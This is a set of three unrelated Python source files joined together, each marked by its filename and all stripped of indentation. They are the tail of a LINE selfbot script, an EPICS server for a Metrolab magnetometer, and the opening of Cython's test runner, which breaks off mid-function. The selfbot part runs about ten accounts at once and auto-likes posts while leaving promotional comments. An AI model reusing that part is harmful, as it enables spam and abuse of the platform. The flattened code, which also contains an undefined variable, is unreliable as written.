wait2['ROM'][op.param1][op.param2] = "- " + Name
else:
cl.sendText
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"]
cl.updateProfile(profile)
profile2 = ki.getProfile()
profile2.displayName = wait["cName2"]
ki.updateProfile(profile2)
profile3 = kk.getProfile()
profile3.displayName = wait["cName3"]
kk.updateProfile(profile3)
profile4 = kc.getProfile()
profile4.displayName = wait["cName4"]
kc.updateProfile(profile4)
profile5 = ks.getProfile()
profile5.displayName = wait["cName5"]
ks.updateProfile(profile5a)
profile6 = ka.getProfile()
profile6.displayName = wait["cName6"]
ka.updateProfile(profile6)
profile7 = kb.getProfile()
profile7.displayName = wait["cName7"]
kb.updateProfile(profile7)
profile8 = ko.getProfile()
profile8.displayName = wait["cName8"]
ko.updateProfile(profile8)
profile9 = ke.getProfile()
profile9.displayName = wait["cName9"]
ke.updateProfile(profile9)
profile10 = ku.getProfile()
profile10.displayName = wait["cName10"]
ku.updateProfile(profile10)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
def autolike():
for zx in range(0,20):
hasil = cl.activity(limit=200)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1003)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Auto Like by\nline.me/ti/p/~boy29putra")
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1003)
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1003)
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1003)
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(200)
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
pcaspy_server.py
|
import numpy as np
import time
from pcaspy import Driver, SimpleServer, Severity
import threading as th
import queue
import thm1176MFusbtmc as thm1176MF
from usbtmc.usbtmc import find_device
prefix = 'METROLAB:'
pvdb = {
'Block' : {'type': 'int', 'value': 1},
'Average' : {'type': 'int', 'value': 200},
'Period' : {'type': 'float', 'value': 0.001, 'unit': 's'},
'Trigger' : {'type': 'enum', 'enums': [''], 'value': 0},
'Range' : {'type': 'enum', 'enums': [''], 'value': 0},
'B' : {'type': 'float', 'value': 0, 'unit': 'T'},
'Bx' : {'type': 'float', 'value': 0, 'unit': 'T'},
'By' : {'type': 'float', 'value': 0, 'unit': 'T'},
'Bz' : {'type': 'float', 'value': 0, 'unit': 'T'},
'dt' : {'type': 'float', 'value': 0, 'unit': 's'},
'dB' : {'type': 'float', 'value': 0, 'unit': 'T/s'},
'dBx' : {'type': 'float', 'value': 0, 'unit': 'T/s'},
'dBy' : {'type': 'float', 'value': 0, 'unit': 'T/s'},
'dBz' : {'type': 'float', 'value': 0, 'unit': 'T/s'},
'Timer' : {'type': 'float', 'value': 0.5},
'Connected': {'type': 'enum', 'enums': ['Not connected', 'Connected'], 'states': [Severity.MAJOR_ALARM, Severity.NO_ALARM], 'value': 0},
}
class THM1176MFDriver(Driver):
def __init__(self):
Driver.__init__(self)
r = find_device(idVendor=0x1bfa, idProduct=0x0498)
period = self.getParam('Period')
average = self.getParam('Average')
block = self.getParam('Block')
self.setParam('Connected', 0)
self.updatePVs()
self.instruction_queue = queue.Queue()
self.device = thm1176MF.thm1176(address=r, period=period, average=average, block=block)
ranges = list(self.device.ranges)
ranges.append('AUTO')
self.setParamEnums('Range', ranges)
res, auto = self.device.range
details = self.getParamInfo('Range')
if auto:
self.setParam('Range', details['enums'].index('AUTO'))
else:
self.setParam('Range', details['enums'].index(res))
self.setParamEnums('Trigger', list(self.device.triggers))
self.setParam('Trigger', self.getParamInfo('Trigger', info_keys=['enums'])['enums'].index(self.device.trigger.capitalize()))
self.setParam('Connected', 1)
self.updatePVs()
self.mapping = {
'Block': self.setBlock,
'Average': self.setAverage,
'Period': self.setPeriod,
'Trigger': self.setTrigger,
'Range': self.setRange,
'Timer': self.setTimer,
}
self.looping = True
self.t = time.perf_counter()
self.timerThread = th.Thread(target=self.signalData)
self.timerThread.setDaemon(True)
self.loopThread = th.Thread(target=self.loop)
self.loopThread.setDaemon(True)
self.loopThread.start()
self.timerThread.start()
def signalData(self):
while self.looping:
if self.instruction_queue.empty():
self.instruction_queue.put('DATA')
time.sleep(self.getParam('Timer'))
def setRange(self, range):
range = self.getParamInfo('Range', info_keys=['enums'])['enums'][range]
self.device.range = range
res, auto = self.device.range
details = self.getParamInfo('Range')
if auto:
self.setParam('Range', details['enums'].index('AUTO'))
else:
self.setParam('Range', details['enums'].index(res))
self.updatePVs()
def setTrigger(self, trigger):
trigger = self.getParamInfo('Trigger', info_keys=['enums'])['enums'][trigger]
self.device.trigger = trigger
trigger = self.device.trigger.capitalize()
details = self.getParamInfo('Trigger')
self.setParam('Range', details['enums'].index(trigger))
def setBlock(self, block):
block = max(1, block)
self.checkTimer(block=block)
self.device.block = int(block)
self.setParam('Block', self.device.block)
def setAverage(self, average):
average = max(10, average)
self.checkTimer(average=average)
self.device.average = int(average)
self.setParam('Average', self.device.average)
def setPeriod(self, period):
period = max(0.05, period)
self.checkTimer(period=period)
self.device.period = int(period)
self.setParam('Period', self.device.period)
def checkTimer(self, block=None, average=None, period=None, timer=None):
if block is None:
block = self.device.block
if average is None:
average = self.device.average
if period is None:
period = self.device.period
if timer is None:
timer = self.getParam('Timer')
min_timer = (block + 1) * period
self.setParam('Timer', max(min_timer, timer))
def setTimer(self, timer):
self.checkTimer(timer=timer)
def loop(self):
while self.looping:
instr = self.instruction_queue.get(block=True)
try:
if instr == 'DATA':
self.device.get_data_array()
try:
B = self.device.B[-1]
X = self.device.X[-1]
Y = self.device.Y[-1]
Z = self.device.Z[-1]
dt = self.device.dt
dB = (B - self.getParam('B')) / dt
dX = (X - self.getParam('Bx')) / dt
dY = (Y - self.getParam('By')) / dt
dZ = (Z - self.getParam('Bz')) / dt
self.setParam('B', B)
self.setParam('Bx', X)
self.setParam('By', Y)
self.setParam('Bz', Z)
self.setParam('dB', dB)
self.setParam('dBx', dX)
self.setParam('dBy', dY)
self.setParam('dBz', dZ)
self.setParam('dt', dt)
except IndexError:
pass
else:
reason, value = instr
reason = reason.split(':')[-1]
if reason in self.mapping.keys():
self.mapping[reason](value)
self.setParam('Connected', 1)
except:
self.setParam('Connected', 0)
self.device.close()
r = find_device(idVendor=0x1bfa, idProduct=0x0498)
period = self.getParam('Period')
average = self.getParam('Average')
block = self.getParam('Block')
self.device = thm1176MF.thm1176(address=r, period=period, average=average, block=block)
self.updatePVs()
def write(self, reason, value):
r = reason.split(':')[-1]
if reason in self.mapping.keys():
try:
self.instruction_queue.put((reason, value), block=True)
super().write(reason, value)
except:
pass
def stop(self):
self.looping = False
if __name__ == '__main__':
server = SimpleServer()
server.createPV(prefix, pvdb)
driver = THM1176MFDriver()
while True:
server.process(0.001)
|
runtests.py
|
#!/usr/bin/env python
from __future__ import print_function
import atexit
import os
import sys
import re
import gc
import heapq
import locale
import shutil
import time
import unittest
import doctest
import operator
import subprocess
import tempfile
import traceback
import warnings
import zlib
import glob
from contextlib import contextmanager
try:
import platform
IS_PYPY = platform.python_implementation() == 'PyPy'
IS_CPYTHON = platform.python_implementation() == 'CPython'
except (ImportError, AttributeError):
IS_CPYTHON = True
IS_PYPY = False
from io import open as io_open
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # doesn't accept 'str' in Py2
try:
import cPickle as pickle
except ImportError:
import pickle
try:
import threading
except ImportError: # No threads, no problems
threading = None
try:
from collections import defaultdict
except ImportError:
class defaultdict(object):
def __init__(self, default_factory=lambda : None):
self._dict = {}
self.default_factory = default_factory
def __getitem__(self, key):
if key not in self._dict:
self._dict[key] = self.default_factory()
return self._dict[key]
def __setitem__(self, key, value):
self._dict[key] = value
def __contains__(self, key):
return key in self._dict
def __repr__(self):
return repr(self._dict)
def __nonzero__(self):
return bool(self._dict)
try:
from unittest import SkipTest
except ImportError:
class SkipTest(Exception): # don't raise, only provided to allow except-ing it!
pass
def skip_test(reason):
sys.stderr.write("Skipping test: %s\n" % reason)
else:
def skip_test(reason):
raise SkipTest(reason)
try:
basestring
except NameError:
basestring = str
WITH_CYTHON = True
CY3_DIR = None
from distutils.command.build_ext import build_ext as _build_ext
from distutils import sysconfig
from distutils import ccompiler
_to_clean = []
@atexit.register
def _cleanup_files():
"""
This is only used on Cygwin to clean up shared libraries that are unsafe
to delete while the test suite is running.
"""
for filename in _to_clean:
if os.path.isdir(filename):
shutil.rmtree(filename, ignore_errors=True)
else:
try:
os.remove(filename)
except OSError:
pass
def get_distutils_distro(_cache=[]):
if _cache:
return _cache[0]
# late import to accommodate for setuptools override
from distutils.dist import Distribution
distutils_distro = Distribution()
if sys.platform == 'win32':
# TODO: Figure out why this hackery (see http://thread.gmane.org/gmane.comp.python.cython.devel/8280/).
config_files = distutils_distro.find_config_files()
try:
config_files.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(config_files)
cfgfiles = distutils_distro.find_config_files()
try:
cfgfiles.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(cfgfiles)
_cache.append(distutils_distro)
return distutils_distro
EXT_DEP_MODULES = {
'tag:numpy': 'numpy',
'tag:numpy_old': 'numpy',
'tag:pythran': 'pythran',
'tag:setuptools': 'setuptools.sandbox',
'tag:asyncio': 'asyncio',
'tag:pstats': 'pstats',
'tag:posix': 'posix',
'tag:array': 'array',
'tag:coverage': 'Cython.Coverage',
'Coverage': 'Cython.Coverage',
'tag:ipython': 'IPython.testing.globalipapp',
'tag:jedi': 'jedi_BROKEN_AND_DISABLED',
'tag:test.support': 'test.support', # support module for CPython unit tests
}
def patch_inspect_isfunction():
import inspect
orig_isfunction = inspect.isfunction
def isfunction(obj):
return orig_isfunction(obj) or type(obj).__name__ == 'cython_function_or_method'
isfunction._orig_isfunction = orig_isfunction
inspect.isfunction = isfunction
def unpatch_inspect_isfunction():
import inspect
try:
orig_isfunction = inspect.isfunction._orig_isfunction
except AttributeError:
pass
else:
inspect.isfunction = orig_isfunction
def def_to_cdef(source):
'''
Converts the module-level def methods into cdef methods, i.e.
@decorator
def foo([args]):
"""
[tests]
"""
[body]
becomes
def foo([args]):
"""
[tests]
"""
return foo_c([args])
cdef foo_c([args]):
[body]
'''
output = []
skip = False
def_node = re.compile(r'def (\w+)\(([^()*]*)\):').match
lines = iter(source.split('\n'))
for line in lines:
if not line.strip():
output.append(line)
continue
if skip:
if line[0] != ' ':
skip = False
else:
continue
if line[0] == '@':
skip = True
continue
m = def_node(line)
if m:
name = m.group(1)
args = m.group(2)
if args:
args_no_types = ", ".join(arg.split()[-1] for arg in args.split(','))
else:
args_no_types = ""
output.append("def %s(%s):" % (name, args_no_types))
line = next(lines)
if '"""' in line:
has_docstring = True
output.append(line)
for line in lines:
output.append(line)
if '"""' in line:
break
else:
has_docstring = False
output.append(" return %s_c(%s)" % (name, args_no_types))
output.append('')
output.append("cdef %s_c(%s):" % (name, args))
if not has_docstring:
output.append(line)
else:
output.append(line)
return '\n'.join(output)
def exclude_extension_in_pyver(*versions):
def check(ext):
return EXCLUDE_EXT if sys.version_info[:2] in versions else ext
return check
def exclude_extension_on_platform(*platforms):
def check(ext):
return EXCLUDE_EXT if sys.platform in platforms else ext
return check
def update_linetrace_extension(ext):
ext.define_macros.append(('CYTHON_TRACE', 1))
return ext
def update_old_numpy_extension(ext):
update_numpy_extension(ext, set_api17_macro=False)
def update_numpy_extension(ext, set_api17_macro=True):
import numpy
from numpy.distutils.misc_util import get_info
ext.include_dirs.append(numpy.get_include())
if set_api17_macro:
ext.define_macros.append(('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION'))
# We need the npymath library for numpy.math.
# This is typically a static-only library.
for attr, value in get_info('npymath').items():
getattr(ext, attr).extend(value)
def update_openmp_extension(ext):
ext.openmp = True
language = ext.language
if sys.platform == 'win32' and sys.version_info[:2] == (3,4):
# OpenMP tests fail in appveyor in Py3.4 -> just ignore them, EoL of Py3.4 is early 2019...
return EXCLUDE_EXT
if language == 'cpp':
flags = OPENMP_CPP_COMPILER_FLAGS
else:
flags = OPENMP_C_COMPILER_FLAGS
if flags:
compile_flags, link_flags = flags
ext.extra_compile_args.extend(compile_flags.split())
ext.extra_link_args.extend(link_flags.split())
return ext
elif sys.platform == 'win32':
return ext
return EXCLUDE_EXT
def update_cpp11_extension(ext):
"""
update cpp11 extensions that will run on versions of gcc >4.8
"""
gcc_version = get_gcc_version(ext.language)
if gcc_version:
compiler_version = gcc_version.group(1)
if float(compiler_version) > 4.8:
ext.extra_compile_args.append("-std=c++11")
return ext
clang_version = get_clang_version(ext.language)
if clang_version:
ext.extra_compile_args.append("-std=c++11")
if sys.platform == "darwin":
ext.extra_compile_args.append("-stdlib=libc++")
ext.extra_compile_args.append("-mmacosx-version-min=10.7")
return ext
return EXCLUDE_EXT
def get_cc_version(language):
"""
finds gcc version using Popen
"""
if language == 'cpp':
cc = sysconfig.get_config_var('CXX')
else:
cc = sysconfig.get_config_var('CC')
if not cc:
cc = ccompiler.get_default_compiler()
if not cc:
return ''
# For some reason, cc can be e.g. 'gcc -pthread'
cc = cc.split()[0]
# Force english output
env = os.environ.copy()
env['LC_MESSAGES'] = 'C'
try:
p = subprocess.Popen([cc, "-v"], stderr=subprocess.PIPE, env=env)
except EnvironmentError:
# Be compatible with Python 3
warnings.warn("Unable to find the %s compiler: %s: %s" %
(language, os.strerror(sys.exc_info()[1].errno), cc))
return ''
_, output = p.communicate()
return output.decode(locale.getpreferredencoding() or 'ASCII', 'replace')
def get_gcc_version(language):
matcher = re.compile(r"gcc version (\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_clang_version(language):
matcher = re.compile(r"clang(?:-|\s+version\s+)(\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_openmp_compiler_flags(language):
"""
As of gcc 4.2, it supports OpenMP 2.5. Gcc 4.4 implements 3.0. We don't
(currently) check for other compilers.
returns a two-tuple of (CFLAGS, LDFLAGS) to build the OpenMP extension
"""
gcc_version = get_gcc_version(language)
if not gcc_version:
if sys.platform == 'win32':
return '/openmp', ''
else:
return None # not gcc - FIXME: do something about other compilers
# gcc defines "__int128_t", assume that at least all 64 bit architectures have it
global COMPILER_HAS_INT128
COMPILER_HAS_INT128 = getattr(sys, 'maxsize', getattr(sys, 'maxint', 0)) > 2**60
compiler_version = gcc_version.group(1)
if compiler_version and compiler_version.split('.') >= ['4', '2']:
return '-fopenmp', '-fopenmp'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
COMPILER = None
COMPILER_HAS_INT128 = False
OPENMP_C_COMPILER_FLAGS = get_openmp_compiler_flags('c')
OPENMP_CPP_COMPILER_FLAGS = get_openmp_compiler_flags('cpp')
# Return this from the EXT_EXTRAS matcher callback to exclude the extension
EXCLUDE_EXT = object()
EXT_EXTRAS = {
'tag:numpy' : update_numpy_extension,
'tag:numpy_old' : update_old_numpy_extension,
'tag:openmp': update_openmp_extension,
'tag:cpp11': update_cpp11_extension,
'tag:trace' : update_linetrace_extension,
'tag:bytesformat': exclude_extension_in_pyver((3, 3), (3, 4)), # no %-bytes formatting
'tag:no-macos': exclude_extension_on_platform('darwin'),
}
# TODO: use tags
VER_DEP_MODULES = {
# tests are excluded if 'CurrentPythonVersion OP VersionTuple', i.e.
# (2,4) : (operator.lt, ...) excludes ... when PyVer < 2.4.x
(2,7) : (operator.lt, lambda x: x in ['run.withstat_py27', # multi context with statement
'run.yield_inside_lambda',
'run.test_dictviews',
'run.pyclass_special_methods',
'run.set_literals',
]),
# The next line should start (3,); but this is a dictionary, so
# we can only have one (3,) key. Since 2.7 is supposed to be the
# last 2.x release, things would have to change drastically for this
# to be unsafe...
(2,999): (operator.lt, lambda x: x in ['run.special_methods_T561_py3',
'run.test_raisefrom',
]),
(3,): (operator.ge, lambda x: x in ['run.non_future_division',
'compile.extsetslice',
'compile.extdelslice',
'run.special_methods_T561_py2'
]),
(3,3) : (operator.lt, lambda x: x in ['build.package_compilation',
'run.yield_from_py33',
'pyximport.pyximport_namespace',
]),
(3,4): (operator.lt, lambda x: x in ['run.py34_signature',
'run.test_unicode', # taken from Py3.7, difficult to backport
]),
(3,4,999): (operator.gt, lambda x: x in ['run.initial_file_path',
]),
(3,5): (operator.lt, lambda x: x in ['run.py35_pep492_interop',
'run.py35_asyncio_async_def',
'run.mod__spec__',
'run.pep526_variable_annotations', # typing module
'run.test_exceptions', # copied from Py3.7+
]),
}
INCLUDE_DIRS = [ d for d in os.getenv('INCLUDE', '').split(os.pathsep) if d ]
CFLAGS = os.getenv('CFLAGS', '').split()
CCACHE = os.getenv('CYTHON_RUNTESTS_CCACHE', '').split()
TEST_SUPPORT_DIR = 'testsupport'
BACKENDS = ['c', 'cpp']
UTF8_BOM_BYTES = r'\xef\xbb\xbf'.encode('ISO-8859-1').decode('unicode_escape')
def memoize(f):
uncomputed = object()
f._cache = {}
def func(*args):
res = f._cache.get(args, uncomputed)
if res is uncomputed:
res = f._cache[args] = f(*args)
return res
return func
@memoize
def parse_tags(filepath):
tags = defaultdict(list)
parse_tag = re.compile(r'#\s*(\w+)\s*:(.*)$').match
with io_open(filepath, encoding='ISO-8859-1', errors='ignore') as f:
for line in f:
# ignore BOM-like bytes and whitespace
line = line.lstrip(UTF8_BOM_BYTES).strip()
if not line:
if tags:
break # assume all tags are in one block
else:
continue
if line[0] != '#':
break
parsed = parse_tag(line)
if parsed:
tag, values = parsed.groups()
if tag in ('coding', 'encoding'):
continue
if tag == 'tags':
tag = 'tag'
print("WARNING: test tags use the 'tag' directive, not 'tags' (%s)" % filepath)
if tag not in ('mode', 'tag', 'ticket', 'cython', 'distutils', 'preparse'):
print("WARNING: unknown test directive '%s' found (%s)" % (tag, filepath))
values = values.split(',')
tags[tag].extend(filter(None, [value.strip() for value in values]))
elif tags:
break # assume all tags are in one block
return tags
list_unchanging_dir = memoize(lambda x: os.listdir(x))
@memoize
def _list_pyregr_data_files(test_directory):
is_data_file = re.compile('(?:[.](txt|pem|db|html)|^bad.*[.]py)$').search
return ['__init__.py'] + [
filename for filename in list_unchanging_dir(test_directory)
if is_data_file(filename)]
def import_ext(module_name, file_path=None):
if file_path:
import imp
return imp.load_dynamic(module_name, file_path)
else:
try:
from importlib import invalidate_caches
except ImportError:
pass
else:
invalidate_caches()
return __import__(module_name, globals(), locals(), ['*'])
class build_ext(_build_ext):
def build_extension(self, ext):
try:
try: # Py2.7+ & Py3.2+
compiler_obj = self.compiler_obj
except AttributeError:
compiler_obj = self.compiler
if ext.language == 'c++':
compiler_obj.compiler_so.remove('-Wstrict-prototypes')
if CCACHE:
compiler_obj.compiler_so = CCACHE + compiler_obj.compiler_so
if getattr(ext, 'openmp', None) and compiler_obj.compiler_type == 'msvc':
ext.extra_compile_args.append('/openmp')
except Exception:
pass
_build_ext.build_extension(self, ext)
class ErrorWriter(object):
match_error = re.compile(r'(warning:)?(?:.*:)?\s*([-0-9]+)\s*:\s*([-0-9]+)\s*:\s*(.*)').match
def __init__(self):
self.output = []
self.write = self.output.append
def _collect(self):
s = ''.join(self.output)
results = {'errors': [], 'warnings': []}
for line in s.splitlines():
match = self.match_error(line)
if match:
is_warning, line, column, message = match.groups()
results['warnings' if is_warning else 'errors'].append((int(line), int(column), message.strip()))
return [["%d:%d: %s" % values for values in sorted(results[key])] for key in ('errors', 'warnings')]
def geterrors(self):
return self._collect()[0]
def getwarnings(self):
return self._collect()[1]
def getall(self):
return self._collect()
def close(self):
pass # ignore, only to match file-like interface
class Stats(object):
def __init__(self, top_n=8):
self.top_n = top_n
self.test_counts = defaultdict(int)
self.test_times = defaultdict(float)
self.top_tests = defaultdict(list)
def add_time(self, name, language, metric, t):
self.test_counts[metric] += 1
self.test_times[metric] += t
top = self.top_tests[metric]
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
# min-heap => pop smallest/shortest until longest times remain
push(top, (t, name, language))
@contextmanager
def time(self, name, language, metric):
t = time.time()
yield
t = time.time() - t
self.add_time(name, language, metric, t)
def update(self, stats):
# type: (Stats) -> None
for metric, t in stats.test_times.items():
self.test_times[metric] += t
self.test_counts[metric] += stats.test_counts[metric]
top = self.top_tests[metric]
for entry in stats.top_tests[metric]:
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
push(top, entry)
def print_stats(self, out=sys.stderr):
if not self.test_times:
return
lines = ['Times:\n']
for metric, t in sorted(self.test_times.items()):
count = self.test_counts[metric]
top = self.top_tests[metric]
lines.append("%-12s: %8.2f sec (%4d, %6.3f / run) - slowest: %s\n" % (
metric, t, count, t / count,
', '.join("'{2}:{1}' ({0:.2f}s)".format(*item) for item in heapq.nlargest(self.top_n, top))))
out.write(''.join(lines))
class TestBuilder(object):
def __init__(self, rootdir, workdir, selectors, exclude_selectors, options,
with_pyregr, languages, test_bugs, language_level,
common_utility_dir, pythran_dir=None,
default_mode='run', stats=None,
add_embedded_test=False):
self.rootdir = rootdir
self.workdir = workdir
self.selectors = selectors
self.exclude_selectors = exclude_selectors
self.annotate = options.annotate_source
self.cleanup_workdir = options.cleanup_workdir
self.cleanup_sharedlibs = options.cleanup_sharedlibs
self.cleanup_failures = options.cleanup_failures
self.with_pyregr = with_pyregr
self.cython_only = options.cython_only
self.languages = languages
self.test_bugs = test_bugs
self.fork = options.fork
self.language_level = language_level
self.test_determinism = options.test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.default_mode = default_mode
self.stats = stats
self.add_embedded_test = add_embedded_test
def build_suite(self):
suite = unittest.TestSuite()
filenames = os.listdir(self.rootdir)
filenames.sort()
for filename in filenames:
path = os.path.join(self.rootdir, filename)
if os.path.isdir(path) and filename != TEST_SUPPORT_DIR:
if filename == 'pyregr' and not self.with_pyregr:
continue
if filename == 'broken' and not self.test_bugs:
continue
suite.addTest(
self.handle_directory(path, filename))
if sys.platform not in ['win32'] and self.add_embedded_test:
# Non-Windows makefile.
if [1 for selector in self.selectors if selector("embedded")] \
and not [1 for selector in self.exclude_selectors if selector("embedded")]:
suite.addTest(unittest.makeSuite(EmbedTest))
return suite
def handle_directory(self, path, context):
workdir = os.path.join(self.workdir, context)
if not os.path.exists(workdir):
os.makedirs(workdir)
suite = unittest.TestSuite()
filenames = list_unchanging_dir(path)
filenames.sort()
for filename in filenames:
filepath = os.path.join(path, filename)
module, ext = os.path.splitext(filename)
if ext not in ('.py', '.pyx', '.srctree'):
continue
if filename.startswith('.'):
continue # certain emacs backup files
if context == 'pyregr':
tags = defaultdict(list)
else:
tags = parse_tags(filepath)
fqmodule = "%s.%s" % (context, module)
if not [ 1 for match in self.selectors
if match(fqmodule, tags) ]:
continue
if self.exclude_selectors:
if [1 for match in self.exclude_selectors
if match(fqmodule, tags)]:
continue
mode = self.default_mode
if tags['mode']:
mode = tags['mode'][0]
elif context == 'pyregr':
mode = 'pyregr'
if ext == '.srctree':
if 'cpp' not in tags['tag'] or 'cpp' in self.languages:
suite.addTest(EndToEndTest(filepath, workdir, self.cleanup_workdir, stats=self.stats))
continue
# Choose the test suite.
if mode == 'pyregr':
if not filename.startswith('test_'):
continue
test_class = CythonPyregrTestCase
elif mode == 'run':
if module.startswith("test_"):
test_class = CythonUnitTestCase
else:
test_class = CythonRunTestCase
elif mode in ['compile', 'error']:
test_class = CythonCompileTestCase
else:
raise KeyError('Invalid test mode: ' + mode)
for test in self.build_tests(test_class, path, workdir,
module, mode == 'error', tags):
suite.addTest(test)
if mode == 'run' and ext == '.py' and not self.cython_only and not filename.startswith('test_'):
# additionally test file in real Python
min_py_ver = [
(int(pyver.group(1)), int(pyver.group(2)))
for pyver in map(re.compile(r'pure([0-9]+)[.]([0-9]+)').match, tags['tag'])
if pyver
]
if not min_py_ver or any(sys.version_info >= min_ver for min_ver in min_py_ver):
suite.addTest(PureDoctestTestCase(module, os.path.join(path, filename), tags, stats=self.stats))
return suite
def build_tests(self, test_class, path, workdir, module, expect_errors, tags):
warning_errors = 'werror' in tags['tag']
expect_warnings = 'warnings' in tags['tag']
if expect_errors:
if skip_c(tags) and 'cpp' in self.languages:
languages = ['cpp']
else:
languages = self.languages[:1]
else:
languages = self.languages
if skip_c(tags) and 'c' in languages:
languages = list(languages)
languages.remove('c')
elif 'no-cpp' in tags['tag'] and 'cpp' in self.languages:
languages = list(languages)
languages.remove('cpp')
pythran_dir = self.pythran_dir
if 'pythran' in tags['tag'] and not pythran_dir and 'cpp' in languages:
import pythran.config
from pythran import __version__ as pythran_version
pythran_ext = (
pythran.config.make_extension(python=True)
if pythran_version >= '0.9' or pythran_version >= '0.8.7'
else pythran.config.make_extension()
)
pythran_dir = pythran_ext['include_dirs'][0]
preparse_list = tags.get('preparse', ['id'])
tests = [ self.build_test(test_class, path, workdir, module, tags, language,
expect_errors, expect_warnings, warning_errors, preparse,
pythran_dir if language == "cpp" else None)
for language in languages
for preparse in preparse_list ]
return tests
def build_test(self, test_class, path, workdir, module, tags, language,
expect_errors, expect_warnings, warning_errors, preparse, pythran_dir):
language_workdir = os.path.join(workdir, language)
if not os.path.exists(language_workdir):
os.makedirs(language_workdir)
workdir = os.path.join(language_workdir, module)
if preparse != 'id':
workdir += '_%s' % str(preparse)
return test_class(path, workdir, module, tags,
language=language,
preparse=preparse,
expect_errors=expect_errors,
expect_warnings=expect_warnings,
annotate=self.annotate,
cleanup_workdir=self.cleanup_workdir,
cleanup_sharedlibs=self.cleanup_sharedlibs,
cleanup_failures=self.cleanup_failures,
cython_only=self.cython_only,
fork=self.fork,
language_level=self.language_level,
warning_errors=warning_errors,
test_determinism=self.test_determinism,
common_utility_dir=self.common_utility_dir,
pythran_dir=pythran_dir,
stats=self.stats)
def skip_c(tags):
if 'cpp' in tags['tag']:
return True
# We don't want to create a distutils key in the
# dictionary so we check before looping.
if 'distutils' in tags:
for option in tags['distutils']:
splitted = option.split('=')
if len(splitted) == 2:
argument, value = splitted
if argument.strip() == 'language' and value.strip() == 'c++':
return True
return False
def filter_stderr(stderr_bytes):
"""
Filter annoying warnings from output.
"""
if b"Command line warning D9025" in stderr_bytes:
# MSCV: cl : Command line warning D9025 : overriding '/Ox' with '/Od'
stderr_bytes = b'\n'.join(
line for line in stderr_bytes.splitlines()
if b"Command line warning D9025" not in line)
return stderr_bytes
class CythonCompileTestCase(unittest.TestCase):
def __init__(self, test_directory, workdir, module, tags, language='c', preparse='id',
expect_errors=False, expect_warnings=False, annotate=False, cleanup_workdir=True,
cleanup_sharedlibs=True, cleanup_failures=True, cython_only=False,
fork=True, language_level=2, warning_errors=False,
test_determinism=False,
common_utility_dir=None, pythran_dir=None, stats=None):
self.test_directory = test_directory
self.tags = tags
self.workdir = workdir
self.module = module
self.language = language
self.preparse = preparse
self.name = module if self.preparse == "id" else "%s_%s" % (module, preparse)
self.expect_errors = expect_errors
self.expect_warnings = expect_warnings
self.annotate = annotate
self.cleanup_workdir = cleanup_workdir
self.cleanup_sharedlibs = cleanup_sharedlibs
self.cleanup_failures = cleanup_failures
self.cython_only = cython_only
self.fork = fork
self.language_level = language_level
self.warning_errors = warning_errors
self.test_determinism = test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.stats = stats
unittest.TestCase.__init__(self)
def shortDescription(self):
return "compiling (%s%s) %s" % (self.language, "/pythran" if self.pythran_dir is not None else "", self.name)
def setUp(self):
from Cython.Compiler import Options
self._saved_options = [
(name, getattr(Options, name))
for name in ('warning_errors', 'clear_to_none', 'error_on_unknown_names', 'error_on_uninitialized')
]
self._saved_default_directives = list(Options.get_directive_defaults().items())
Options.warning_errors = self.warning_errors
if sys.version_info >= (3, 4):
Options._directive_defaults['autotestdict'] = False
if not os.path.exists(self.workdir):
os.makedirs(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
from Cython.Compiler import Options
for name, value in self._saved_options:
setattr(Options, name, value)
Options._directive_defaults = dict(self._saved_default_directives)
unpatch_inspect_isfunction()
try:
sys.path.remove(self.workdir)
except ValueError:
pass
try:
del sys.modules[self.module]
except KeyError:
pass
cleanup = self.cleanup_failures or self.success
cleanup_c_files = WITH_CYTHON and self.cleanup_workdir and cleanup
cleanup_lib_files = self.cleanup_sharedlibs and cleanup
is_cygwin = sys.platform == 'cygwin'
if os.path.exists(self.workdir):
if cleanup_c_files and cleanup_lib_files and not is_cygwin:
shutil.rmtree(self.workdir, ignore_errors=True)
else:
for rmfile in os.listdir(self.workdir):
if not cleanup_c_files:
if (rmfile[-2:] in (".c", ".h") or
rmfile[-4:] == ".cpp" or
rmfile.endswith(".html") and rmfile.startswith(self.module)):
continue
is_shared_obj = rmfile.endswith(".so") or rmfile.endswith(".dll")
if not cleanup_lib_files and is_shared_obj:
continue
try:
rmfile = os.path.join(self.workdir, rmfile)
if os.path.isdir(rmfile):
